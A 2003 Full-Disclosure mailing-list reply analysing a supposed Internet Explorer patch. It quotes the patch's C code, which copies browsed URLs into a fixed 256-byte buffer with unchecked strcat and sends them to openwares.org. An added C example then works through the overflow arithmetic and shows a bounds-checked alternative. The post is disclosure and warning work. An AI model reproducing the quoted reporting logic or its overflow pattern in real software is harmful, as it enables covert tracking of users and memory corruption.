
Re: [Full-Disclosure] Openware.org IE Fix - Warning



On Fri, Dec 19, 2003 at 01:25:48PM +0100, Thierry wrote:
> 
> According to Heise
> (http://www.heise.de/newsticker/data/dab-19.12.03-002/)
> 
> The Openware.org IE fix introduces new flaws :
> 
> - The buffer to copy URL's is limited to 256 bytes
> - Larger strings produce a buffer overflow, with possibility to
>   overwrite the stack.
> 
> BoF Test :
> http://www.heise.de/security/dienste/browsercheck/demos/ie/e5_18.shtml
> (at the bottom, link entitled "TEST DES PATCHES")
DISCLAIMER: I've only read, not executed this source code!

I'd say it's worse than that. From a quick look at the source, I'd say
this one may actually be malicious. (Stupid too, but it looks
malicious)...

In the BeforeNavigateEvent() function of IETray.cpp, the URL is first
truncated to 256 bytes:

char *dest = (char *)malloc(256*sizeof(char));
WideCharToMultiByte( CP_ACP, 0, (BSTR)url->bstrVal, -1,
        dest, 256, NULL, NULL );

Safe enough, I suppose, though it will likely lead to a sub-optimal
browsing experience. Then, if one of the "malicious" characters is
found, it allocates and populates the following buffer:

char surl[256];
strcpy(surl,"http://www.openwares.org/cgi-bin/exploit.cgi?");

At the end of the function, determining what the "real" and "fake" URLs
were, the code unsafely appends them to the buffer:
strcat(surl,sFake);
strcat(surl,"&");
strcat(surl,sTrue);

Copies the result to another string:
MultiByteToWideChar( CP_ACP, 0, surl, -1,
        url, 256 );
And proceeds to send it to the authors of the code (or whomever controls
http://www.openwares.org/):
m_smtWB->Navigate(url,0,0,0,0);

Summary: Not only is there a stupid, possibly exploitable, buffer
overflow here, but the place I'm seeing it is in a section of the code
whose main purpose appears to be submitting information about what you
browse back to the code's authors. I'd say this is malicious... the user
is certainly not warned of this prior to downloading the patch. Since I
never executed it, I have no idea of whether or not they are warned by
an installer. Call it a trojan, call it spyware, but don't execute it.

Regards,

petard

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
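The length arithmetic behind the overflow petard describes, as an added example that is not part of the post and not code from the Openware patch: it assumes only what the post states (each URL is cut to fit a 256-byte buffer, the fixed prefix string, and three unchecked strcat() calls into a 256-byte stack array), shows why two individually "safe" inputs still exceed the destination, and puts a bounds-checked snprintf() build beside it that refuses to emit a truncated URL instead of writing past the end. The sample inputs are constructed.

```c
#include <stdio.h>
#include <string.h>

/* Sizes and the prefix quoted in the post above. */
#define SURL_SIZE 256
#define URL_INPUT_MAX 256
static const char REPORT_PREFIX[] = "http://www.openwares.org/cgi-bin/exploit.cgi?";

/* Bytes needed to hold prefix + fake + "&" + true + terminating NUL. */
size_t required_length(const char *fake_url, const char *true_url)
{
    return strlen(REPORT_PREFIX) + strlen(fake_url) + 1 + strlen(true_url) + 1;
}

/* 1 if the three unchecked strcat() calls would write past surl[256]. */
int would_overflow(const char *fake_url, const char *true_url)
{
    return required_length(fake_url, true_url) > SURL_SIZE;
}

/* Worst case the original code permits: both inputs were already cut to
 * fit a 256-byte buffer (255 chars + NUL), yet their concatenation is not. */
size_t worst_case_length(void)
{
    return strlen(REPORT_PREFIX) + (URL_INPUT_MAX - 1) + 1 + (URL_INPUT_MAX - 1) + 1;
}

/* Hardened replacement (my choice, not the patch's code): snprintf() bounds
 * the write and reports the length the full string would have needed, so
 * the caller can refuse (return -1) rather than send a silently cut URL. */
int build_report_url_checked(char *out, size_t out_size,
                             const char *fake_url, const char *true_url)
{
    int n = snprintf(out, out_size, "%s%s&%s", REPORT_PREFIX, fake_url, true_url);
    if (n < 0 || (size_t)n >= out_size) {
        if (out_size > 0) out[0] = '\0';
        return -1;
    }
    return n; /* characters written, excluding the NUL */
}

/* Same check against a 256-byte stack buffer like the original surl[]. */
int checked_build_result(const char *fake_url, const char *true_url)
{
    char surl[SURL_SIZE];
    return build_report_url_checked(surl, sizeof surl, fake_url, true_url);
}

/* Constructed input: a URL padded to exactly fill a 256-byte buffer. */
static void fill_sample_url(char *buf, size_t buf_size, char pad)
{
    const char head[] = "http://example.com/";
    size_t i = 0;
    for (; i < sizeof(head) - 1 && i < buf_size - 1; i++) buf[i] = head[i];
    for (; i < buf_size - 1; i++) buf[i] = pad;
    buf[i] = '\0';
}

/* Returns 1 when the sample pair overflows surl[] under strcat() but is
 * rejected cleanly by the checked builder. */
int demo(void)
{
    char fake[URL_INPUT_MAX], real[URL_INPUT_MAX];
    fill_sample_url(fake, sizeof fake, 'a');
    fill_sample_url(real, sizeof real, 'b');
    int overflow = would_overflow(fake, real);
    int rc = checked_build_result(fake, real);
    printf("needed %zu bytes, buffer %d: overflow=%d, checked build rc=%d\n",
           required_length(fake, real), SURL_SIZE, overflow, rc);
    return overflow && rc == -1;
}

int main(void) { return demo() ? 0 : 1; }
```

The point the arithmetic makes: the per-URL cap bounds each strcat() operand, not their sum, so the destination would need at least prefix + 255 + 1 + 255 + 1 bytes to be safe, more than twice what surl[] provides.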